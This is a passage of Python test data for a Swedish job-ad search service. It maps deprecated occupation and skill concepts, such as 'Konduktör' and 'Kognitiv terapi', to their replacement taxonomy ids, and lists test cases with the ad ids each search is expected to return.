'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Interaktionsdesigner'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HciA_Cu7_FXt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Användbarhetsexpert',
'taxonomy/preferred-label': 'Användbarhetsexpert', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'QQjZ_NAN_bDR', 'taxonomy/definition': 'Interaktionsdesigner',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Interaktionsdesigner'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fdZE_y62_wdE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsdirektör', 'taxonomy/preferred-label': 'Stadsdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dRXp_E2C_Lq9', 'taxonomy/definition': 'Kommunchef/Kommundirektör/Stadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kommunchef/Kommundirektör/Stadsdirektör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Eo4y_EGW_KVM', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Produktionsingenjör, elkraft',
'taxonomy/preferred-label': 'Produktionsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'twUU_T1n_hW5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Landstingsrevisor', 'taxonomy/preferred-label': 'Landstingsrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aWNX_iEg_NhN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konstruktör, elkraft',
'taxonomy/preferred-label': 'Konstruktör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7ava_ohk_66H', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommunrevisor', 'taxonomy/preferred-label': 'Kommunrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'KhbC_P4c_R82', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef, kommun', 'taxonomy/preferred-label': 'Kanslichef, kommun',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ohrC_dLP_3ad', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilförsvarschef', 'taxonomy/preferred-label': 'Civilförsvarschef',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'cB4Q_Cx9_2Lw', 'taxonomy/definition': 'Beredskapsdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Beredskapsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'tnaT_rPT_RXj', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konduktör', 'taxonomy/preferred-label': 'Konduktör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KMRG_Bda_5CV', 'taxonomy/definition': 'Tågvärd/Tågvärdinna',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Tågvärd/Tågvärdinna'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7yzW_dCg_7s7', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommundirektör', 'taxonomy/preferred-label': 'Kommundirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dRXp_E2C_Lq9', 'taxonomy/definition': 'Kommunchef/Kommundirektör/Stadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kommunchef/Kommundirektör/Stadsdirektör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '9wyj_ibD_Yo1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalsekreterare',
'taxonomy/preferred-label': 'Personalsekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'HR-assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qV9q_oKv_QzL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Turnéproducent för utställningar',
'taxonomy/preferred-label': 'Turnéproducent för utställningar', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'FcaP_vhz_Cuy',
'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'WAH4_sSf_GyE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Utställningskoordinator',
'taxonomy/preferred-label': 'Utställningskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Jsct_XQW_U8u', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Utställningsproducent',
'taxonomy/preferred-label': 'Utställningsproducent', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'FcaP_vhz_Cuy',
'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5GaR_6HQ_8vY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Talboksproducent', 'taxonomy/preferred-label': 'Talboksproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'RSra_C73_mJe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Undertextare', 'taxonomy/preferred-label': 'Undertextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HcpH_1h7_vkK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Nyhetstextare', 'taxonomy/preferred-label': 'Nyhetstextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'PM4A_xoG_hQD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Svensktextare', 'taxonomy/preferred-label': 'Svensktextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7fB3_Ckh_NuC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musiker, folkmusik', 'taxonomy/preferred-label': 'Musiker, folkmusik',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'UCXb_LjK_pHv', 'taxonomy/definition': 'Musiker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Musiker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XSoL_LLU_PYV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Eventproducent', 'taxonomy/preferred-label': 'Eventproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wniw_g2F_JNQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inspelningskoordinator',
'taxonomy/preferred-label': 'Inspelningskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wiGD_eu2_UJV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musikproducent', 'taxonomy/preferred-label': 'Musikproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7rkC_Rot_tat', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sångare, folkmusik', 'taxonomy/preferred-label': 'Sångare, folkmusik',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'k3ZW_16R_riY', 'taxonomy/definition': 'Sångare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sångare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aR3a_5Ly_TDw', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musiker, klassisk musik',
'taxonomy/preferred-label': 'Musiker, klassisk musik', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'UCXb_LjK_pHv', 'taxonomy/definition': 'Musiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Musiker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YmFo_cvw_1Kv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Produktionskoordinator',
'taxonomy/preferred-label': 'Produktionskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dnxZ_Bvb_S9C', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Platskoordinator', 'taxonomy/preferred-label': 'Platskoordinator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'SV22_7W1_pFT', 'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Kh3N_Kg8_KK5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Automationsingenjör, elkraft',
'taxonomy/preferred-label': 'Automationsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kHno_7rL_Lcm', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjuksköterska, geriatrisk vård',
'taxonomy/preferred-label': 'Sjuksköterska, geriatrisk vård', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'uaJs_9YA_Cnp',
'taxonomy/definition': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UjqL_rhp_jC4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Flygledarassistent', 'taxonomy/preferred-label': 'Flygledarassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WUxP_1ih_6RG', 'taxonomy/definition': 'Flight Data Operator/FDO/Flygledarassistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Flight Data Operator/FDO/Flygledarassistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Uoeq_F5q_18w', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef/verksamhetschef, församling',
'taxonomy/preferred-label': 'Kanslichef/verksamhetschef, församling',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2}
]
change_v1_to_v2_skill = [
{'taxonomy/concept': {'taxonomy/id': 'zDPA_vcC_GqY', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Kognitiv terapi', 'taxonomy/preferred-label': 'Kognitiv terapi',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'bhp9_3YQ_YMH', 'taxonomy/definition': 'Kognitiv psykoterapi', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Kognitiv psykoterapi'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'omTo_PiA_RX6', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Psykodynamisk inriktning',
'taxonomy/preferred-label': 'Psykodynamisk inriktning', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'ZnGd_a1m_2Fi', 'taxonomy/definition': 'Psykodynamisk psykoterapi',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Psykodynamisk psykoterapi'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dcYP_eMq_xNY', 'taxonomy/type': 'skill',
'taxonomy/definition': 'BB2 (vissa enkla elinstallationer)',
'taxonomy/preferred-label': 'BB2 (vissa enkla elinstallationer)', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '4mNF_7vZ_vCx', 'taxonomy/definition': 'B - Begränsad auktorisation',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'B - Begränsad auktorisation'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2nAr_Bhe_vda', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Sidmontering', 'taxonomy/preferred-label': 'Sidmontering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '16sV_pbX_iED', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Textbearbetning', 'taxonomy/preferred-label': 'Textbearbetning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fUzi_DwE_dMu', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Kopparsticksgravyr', 'taxonomy/preferred-label': 'Kopparsticksgravyr',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fvXQ_LWU_T8z', 'taxonomy/type': 'skill', 'taxonomy/definition': 'Kartgravyr',
'taxonomy/preferred-label': 'Kartgravyr', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Prepressarbete'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NBXw_2xF_89L', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Stålsticksgravyr', 'taxonomy/preferred-label': 'Stålsticksgravyr',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2X76_itb_csw', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Originalmontering', 'taxonomy/preferred-label': 'Originalmontering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EQQL_1YJ_JVX', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Textsättning', 'taxonomy/preferred-label': 'Textsättning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UW8w_CQg_a9V', 'taxonomy/type': 'skill',
'taxonomy/definition': '4-färgsseparering', 'taxonomy/preferred-label': '4-färgsseparering',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '8ntq_a4w_7mH', 'taxonomy/definition': 'Prepressarbete', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Prepressarbete'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EL4A_hSn_JYx', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Estetiska programmet/Musik, undervisning',
'taxonomy/preferred-label': 'Estetiska programmet/Musik, undervisning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HUBG_Mz2_X1G', 'taxonomy/definition': 'Estetiska programmet, undervisning',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Estetiska programmet, undervisning'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AbDo_gbm_f46', 'taxonomy/type': 'skill', 'taxonomy/definition': 'CAD-ritning',
'taxonomy/preferred-label': 'CAD-ritning', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'oaiv_GsB_AFK', 'taxonomy/definition': 'CAD-konstruktion/CAD-ritning',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'CAD-konstruktion/CAD-ritning'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'QU9n_VJq_kYo', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Motorsport/sport', 'taxonomy/preferred-label': 'Motorsport/sport',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '5AdH_yyr_MPW', 'taxonomy/definition': 'Sportjournalistik', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Sportjournalistik'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'vHbJ_BUC_xDW', 'taxonomy/type': 'skill', 'taxonomy/definition': 'Mode/design',
'taxonomy/preferred-label': 'Mode/design', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'LyVp_zhc_czS', 'taxonomy/definition': 'Modejournalistik',
'taxonomy/type': 'skill', 'taxonomy/preferred-label': 'Modejournalistik'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SENm_xRv_P3b', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Spabehandlingar', 'taxonomy/preferred-label': 'Spabehandlingar',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'vHaL_11u_eEi', 'taxonomy/definition': 'Spabehandling', 'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Spabehandling'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1iPF_7Cg_zUm', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Mästarbrev, konstbrodör',
'taxonomy/preferred-label': 'Mästarbrev, konstbrodör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'TJ8G_gZg_5tL', 'taxonomy/definition': 'Mästarbrev, broderi/konstbroderi',
'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Mästarbrev, broderi/konstbroderi'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'QGSv_ngN_iA9', 'taxonomy/type': 'skill',
'taxonomy/definition': 'Gesällbrev, konstbrodör',
'taxonomy/preferred-label': 'Gesällbrev, konstbrodör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'EmPd_sYg_gz3', 'taxonomy/definition': 'Gesällbrev, broderi/konstbroderi',
'taxonomy/type': 'skill',
'taxonomy/preferred-label': 'Gesällbrev, broderi/konstbroderi'}]},
'taxonomy/version': 2},
]
```
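The `change_v1_to_v2` and `change_v1_to_v2_skill` lists above pair each deprecated concept with its replacement under `taxonomy/replaced-by`. A minimal sketch of how such a list can be collapsed into a deprecated-id to replacement-id lookup (the helper `build_replacement_lookup` is illustrative, not part of the repository, and assumes one replacement per deprecated concept, as in the data above):

```python
# Illustrative sketch only; build_replacement_lookup is not part of the repository.
def build_replacement_lookup(changes):
    """Map each deprecated taxonomy concept id to the id of its replacement."""
    lookup = {}
    for entry in changes:
        concept = entry['taxonomy/concept']
        replacements = concept.get('taxonomy/replaced-by', [])
        if concept.get('taxonomy/deprecated') and replacements:
            # Each entry in these lists carries exactly one replacement concept.
            lookup[concept['taxonomy/id']] = replacements[0]['taxonomy/id']
    return lookup


skill_lookup = build_replacement_lookup(change_v1_to_v2_skill)
assert skill_lookup['zDPA_vcC_GqY'] == 'bhp9_3YQ_YMH'  # 'Kognitiv terapi' -> 'Kognitiv psykoterapi'
```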
#### File: concept_ids/taxonomy_replace/test_data_with_expected_hits.py
```python
def get_test_data_with_expected_hits(list_of_test_data):
    """Keep only the test cases that are expected to return hits (non-empty 'hits' list)."""
    tmp = []
    for item in list_of_test_data:
        if item['hits']:
            tmp.append(item)
    return tmp


def get_occupations_with_expected_hits():
    return get_test_data_with_expected_hits(test_data_occupation)


def get_skills_with_expected_hits():
    return get_test_data_with_expected_hits(test_data_skills)
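
# Hedged usage sketch (assumption: these helpers feed integration tests against the
# search API elsewhere in the repo; the exact test harness is not shown here):
#
#   for case in get_occupations_with_expected_hits():
#       # search for case['replaced_by'] (the new concept id) and assert that the
#       # ad ids listed in case['hits'] appear in the response
#       ...
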
test_data_occupation = [{'new_label': 'Veterinär', 'replaced_by': 'GgmE_SvH_mtm', 'old_replaced': ['e885_ehx_zxp'],
'hits': ['24622052', '24612672']},
{'new_label': 'Artistagent/Artistbokare/Artistförmedlare', 'replaced_by': '2LBV_CoV_iEf',
'old_replaced': ['dunj_FU3_Fx5', 'GUHc_KyJ_Dst'], 'hits': []},
{'new_label': 'Försäkringshandläggare, försäkringskassa', 'replaced_by': '2AGe_heZ_E94',
'old_replaced': ['FoCc_qZ4_Yi8'], 'hits': []},
{'new_label': 'Utvecklingsingenjör, elkraft', 'replaced_by': 'YcvM_Gqk_6U7',
'old_replaced': ['Jx4V_6tm_fUH'], 'hits': ['24647561', '24645432', '24615762', '24504276']},
{'new_label': 'Vapentekniker', 'replaced_by': 'KiD2_B8H_U7U',
'old_replaced': ['XN3S_vj8_8Wz', '4Ujg_KC9_cLT'], 'hits': []},
{'new_label': 'Montör, gummi- och plastprodukter', 'replaced_by': 'efyx_6es_7jQ',
'old_replaced': ['JKDm_nyA_8bK'], 'hits': ['24648645', '24641319', '24638460', '24635077']},
{'new_label': 'Koordinator: kultur, media, film, dataspel', 'replaced_by': 'SV22_7W1_pFT',
'old_replaced': ['WAH4_sSf_GyE', 'wniw_g2F_JNQ', 'YmFo_cvw_1Kv', 'dnxZ_Bvb_S9C'],
'hits': ['24674944', '24641084']},
{'new_label': 'B - Begränsad auktorisation', 'replaced_by': '4mNF_7vZ_vCx',
'old_replaced': ['dcYP_eMq_xNY'], 'hits': []},
{'new_label': 'Löneadministratör/Lönekonsult', 'replaced_by': 'nRLP_eqC_ow9',
'old_replaced': ['GGA1_QkE_XgN', 'R33K_7kd_PPT'],
'hits': ['24649915', '24624230', '24619974']},
{'new_label': 'F&B Manager/Food and beverage manager', 'replaced_by': 'Bfn9_6FK_iaY',
'old_replaced': ['RhoN_Vdo_F5H'], 'hits': ['24649158']},
{'new_label': 'Assessor', 'replaced_by': 'U9AU_Rre_pbM', 'old_replaced': ['qic5_pQo_xhT'],
'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['2nAr_Bhe_vda', '16sV_pbX_iED', 'fUzi_DwE_dMu', 'fvXQ_LWU_T8z',
'NBXw_2xF_89L',
'2X76_itb_csw', 'EQQL_1YJ_JVX', 'UW8w_CQg_a9V'], 'hits': []},
{'new_label': 'Kurator', 'replaced_by': 'YpRs_ybt_47a',
'old_replaced': ['L8Hw_5mJ_zic', 'Y86G_M6o_9R8'],
'hits': ['24640701', '24633665', '24626839', '24543668', '24437169']},
{'new_label': 'Elektriker, film/Elektriker, TV', 'replaced_by': 'UtA2_od9_3WT',
'old_replaced': ['X4cv_VTi_Muz'], 'hits': []},
{'new_label': 'Redaktör', 'replaced_by': 'GFu2_s4q_9sr', 'old_replaced': ['LCCW_oaP_6kn'],
'hits': []},
{'new_label': 'HR-chef', 'replaced_by': 'y22E_Nz6_5VU',
'old_replaced': ['79uB_oJR_dSQ', 'nSdx_qDe_vCh'],
'hits': ['24647998', '24623695', '24566659', '24442113']},
{'new_label': 'Elkvalitetsanalytiker, elkraft', 'replaced_by': 'p4vQ_Dpo_d6a',
'old_replaced': ['XZrs_VW9_31C'], 'hits': []},
{'new_label': 'Annonsassistent/Annonssekreterare', 'replaced_by': 'MegR_77J_CGU',
'old_replaced': ['YrxV_b6A_Dav'], 'hits': []},
{'new_label': 'Kognitiv psykoterapi', 'replaced_by': 'bhp9_3YQ_YMH',
'old_replaced': ['zDPA_vcC_GqY'],
'hits': []},
{'new_label': 'Teknisk chef, kommun', 'replaced_by': 'iJfW_Lt2_sQt',
'old_replaced': ['SpMJ_sSm_Vjp'],
'hits': []},
{'new_label': 'Internatföreståndare/Skolmåltidsföreståndare', 'replaced_by': 'VKcv_Mbu_KJE',
'old_replaced': ['jNaB_ozm_pm7'], 'hits': []},
{'new_label': 'Sångare', 'replaced_by': 'k3ZW_16R_riY',
'old_replaced': ['VtTs_Y26_KMJ', '7rkC_Rot_tat'],
'hits': []},
{'new_label': 'Redovisningskonsult', 'replaced_by': 'CeoS_Wzo_uz5',
'old_replaced': ['ayC6_Lks_sFQ', 'i5JT_We2_TpX', 'Ffsi_TDN_PDF', 'HeRm_ChB_HVB'],
'hits': ['24640665', '24635281', '24619295', '24618922', '24596487', '24595573', '24578086',
'24565035',
'24553781', '24541494']},
